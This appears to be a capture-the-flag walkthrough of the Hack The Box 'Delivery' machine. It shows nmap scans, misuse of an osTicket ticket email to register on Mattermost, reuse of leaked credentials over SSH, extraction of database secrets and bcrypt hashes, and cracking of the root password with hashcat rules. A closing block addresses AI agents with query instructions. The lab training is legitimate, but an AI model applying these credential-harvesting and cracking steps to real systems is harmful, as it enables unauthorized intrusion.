# Delivery 10.10.10.222 ## Reconnaissance: NMAP ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sC -sV -O 10.10.10.222 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) 80/tcp open http nginx 1.14.2 |_http-title: Welcome |_http-server-header: nginx/1.14.2 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=1%CU=32936%PV=Y%DS=2%DC=I%G=Y%TM=65B0 OS:DE4A%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A) OS:SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AS OS:T11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1= OS:FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O= OS:M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N) OS:T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF= OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) ``` ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sU -O 10.10.10.222 631/udp open|filtered ipp 5353/udp open|filtered zeroconf Too many fingerprints match this host to give specific OS details Network Distance: 2 hops OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1038.41 seconds ``` ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sC -sV -p- 10.10.10.222 ``` ## Enumeration: SSH Port 22/tcp OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) Based on the OpenSSH version, the host is likely running Debian Buster (10). The HTTP scripts for TCP 8065 show the string “Mattermost”, so it could be an instance of that open source Slack alternative. ## Enumeration: HTTP Port 80/tcp The site is not really for anything, but does mention checking out the helpdesk for email related support: view-source: [http://10.10.10.222/#contact-us \ @delivery.htb ]() ``` ┌──(kali💀kali)-[~] └─$ sudo nano /etc/hosts 10.10.10.222 delivery.htb 10.10.10.222 helpdesk.delivery.htb ``` \[ \\ \ \ ]\() The link goes to helpdesk.delivery.htb. I’ll add both that subdomain and the base domain (delivery.htb) to my local /etc/hosts file. The HelpDesk link is the as the one above. The MatterMost server link is to helpdesk.htb:8065, which explains the other port. There’s also some hint here as to the path. I need to get a @delivery.htb email to get access to the MatterMost server. helpdesk.htb:8065 \ @delivery.htb **helpdesk.delivery.htb - TCP 80** This is an instance of osTicket: [http://helpdesk.delivery.htb/ ]() As a guest user, I can create a ticket: \ And it will give me a page saying it’s been accepted: \ The email to add to the ticket is interesting. I’ll note that. ``` exodus, You may check the status of your ticket, by navigating to the Check Status page using ticket id: 4264890. If you want to add more information to your ticket, just email 4264890@delivery.htb. Thanks, Support Team ``` The Sign In link has a form, as well as a registration link: On clicking “Create an account” and filling out the form, it gives me a page that says a link has been sent to the email to activate it. On HTB, that’s basically a deadend. If I try to log in, it returns this error: If I click the Check Ticket Status link, it asks for an email or ticket number. Because no validation was done of my email when submitting a ticket as a Guest User, I can enter that email and ticket number: This page gives the current ticket, with the option to update it: ``` http://helpdesk.delivery.htb/tickets.php 4264890 exodus@htb.eu ``` **delivery.htb - TCP 8065** The main page here is a login form: [http://delivery.htb/ \ http://delivery.htb:8065/login]() The create account link leads to another form: \ Submitting also leads to an email confirmation step: \ Without an email address, not much I can do here. ## Shell as maildeliverer **Access to MatterMost:** \ The note above suggested that I needed a @delivery.htb email address to get an account. It looks like it will work without one, but practically, I can’t receive emails at an outside account because HTB labs are not connected to the internet. I did note that when I created a ticket, it offered the ability to update the ticket over email. I can use that to get the verification email. I’ll create a ticket and get the email address for it. Then sign up for a MatterMost account: ``` 4264890@delivery.htb exodus Password123$$ ``` ``` http://helpdesk.delivery.htb/tickets.php ---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=49zi8zjpe1sabof8xy7ygj5um7hqxex5gmg9ajdancddfspujrdo9siwhfj9kxc8&email=4264890%40delivery.htb ``` Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from: {% embed url="" %} Visiting the link in the ticket verifies the account: \ One logging in, there’s a chance to join a team: \ On joining that team, there’s a single channel, with some chat from root: ``` root 9:29 AM @developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail! Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!" ``` I’ll note creds for the account maildeliverer, as well as a hint that a lot of the passwords on the box are variants of “PleaseSubscribe!”, and a note about how Hashcat rules will find the variants. **SSH:**\ Those creds do work to SSH to the box: ``` ┌──(kali💀kali)-[~] └─$ ssh maildeliverer@10.10.10.222 Youve_G0t_Mail! maildeliverer@Delivery:~$ whoami maildeliverer maildeliverer@Delivery:~$ ls user.txt maildeliverer@Delivery:~$ cat user.txt f085e4---------------------------- ``` ## Shell as root **Enumeration:** \ MM Config Mattermost stores it’s configuration in /opt/mattermost/config/config.json. The database connection information is in here: ``` maildeliverer@Delivery:~$ cd /opt/mattermost/config maildeliverer@Delivery:/opt/mattermost/config$ ls cloud_defaults.json config.json README.md "GfycatApiSecret": "3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof", "SqlSettings": { "DriverName": "mysql", "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s", "DataSourceReplicas": [], "DataSourceSearchReplicas": [], "MaxIdleConns": 20, "ConnMaxLifetimeMilliseconds": 3600000, "MaxOpenConns": 300, "Trace": false, "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez", "QueryTimeout": 30, "DisableDatabaseSearch": false ``` The database password is there, along with a hint as to where to go next. **SQL:**\ I’ll connect to the DB with the creds in the config above: ```sql }maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW mattermot MariaDB [mattermost]> ``` There’s only the default DB and mattermost: ```sql MariaDB [mattermost]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mattermost | +--------------------+ ``` I can see from the prompt that I’m already using the mattermost db, but if I needed to switch, use mattermost would do that. The mattermost database has a lot of tables: ```sql MariaDB [mattermost]> show tables; +------------------------+ | Tables_in_mattermost | +------------------------+ | Audits | | Bots | | ChannelMemberHistory | | ChannelMembers | | Channels | | ClusterDiscovery | | CommandWebhooks | | Commands | | Compliances | | Emoji | | FileInfo | | GroupChannels | | GroupMembers | | GroupTeams | | IncomingWebhooks | | Jobs | | Licenses | | LinkMetadata | | OAuthAccessData | | OAuthApps | | OAuthAuthData | | OutgoingWebhooks | | PluginKeyValueStore | | Posts | | Preferences | | ProductNoticeViewState | | PublicChannels | | Reactions | | Roles | | Schemes | | Sessions | | SidebarCategories | | SidebarChannels | | Status | | Systems | | TeamMembers | | Teams | | TermsOfService | | ThreadMemberships | | Threads | | Tokens | | UploadSessions | | UserAccessTokens | | UserGroups | | UserTermsOfService | | Users | +------------------------+ ``` I’ll start with the users table: ```sql MariaDB [mattermost]> select Username,Password from Users; +----------------------------------+--------------------------------------------------------------+ | Username | Password | +----------------------------------+--------------------------------------------------------------+ | surveybot | | | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | | exodus | $2a$10$yjkicDs/LIqpEYOubdn0zODZ6oY0ULXd8mtkvHGk8FNmAaTR1vUVu | | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | | channelexport | | | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | +----------------------------------+--------------------------------------------------------------+ ``` A lot of those look like other users or me. I’ll focus on the root user. **Crack Password:** \ I’ll drop the hash into a file: ``` ┌──(kali💀kali)-[~/Desktop] └─$ nano hash ┌──(kali💀kali)-[~/Desktop] └─$ cat hash root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO ``` Based on the comments from Mattermost, I’ll create a file with the password: ``` ┌──(kali💀kali)-[~/Desktop] └─$ nano password ┌──(kali💀kali)-[~/Desktop] └─$ cat password PleaseSubscribe! ``` Now I can run with a rule file to get different variations on the passwords in the file (just one in this case). There are many in /usr/share/hashcat/rules, but why not start with the one called “best”: ``` ┌──(kali💀kali)-[~/Desktop] └─$ hashcat -m 3200 hash password --user -r /usr/share/hashcat/rules/best64.rule $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 Session..........: hashcat Status...........: Cracked Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix)) Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO Time.Started.....: Wed Jan 24 07:11:26 2024 (2 secs) Time.Estimated...: Wed Jan 24 07:11:28 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (password) Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 8 H/s (0.35ms) @ Accel:6 Loops:8 Thr:1 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 21/77 (27.27%) Rejected.........: 0/21 (0.00%) Restore.Point....: 0/1 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1016-1024 Candidate.Engine.: Device Generator Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21 Hardware.Mon.#1..: Util: 18% Started: Wed Jan 24 07:10:37 2024 Stopped: Wed Jan 24 07:11:29 2024 ``` It cracks pretty quickly. **su:**\ That password works for the root account on Delivery: ``` maildeliverer@Delivery:/opt/mattermost/config$ su - Password: PleaseSubscribe!21 root@Delivery:~# whoami root root@Delivery:~# ls mail.sh note.txt py-smtp.py root.txt root@Delivery:~# cat root.txt 064c3fd---------------------------- ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-exodussec.gitbook.io/cheatsheet55/htb-linux-oscp-prep/delivery.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.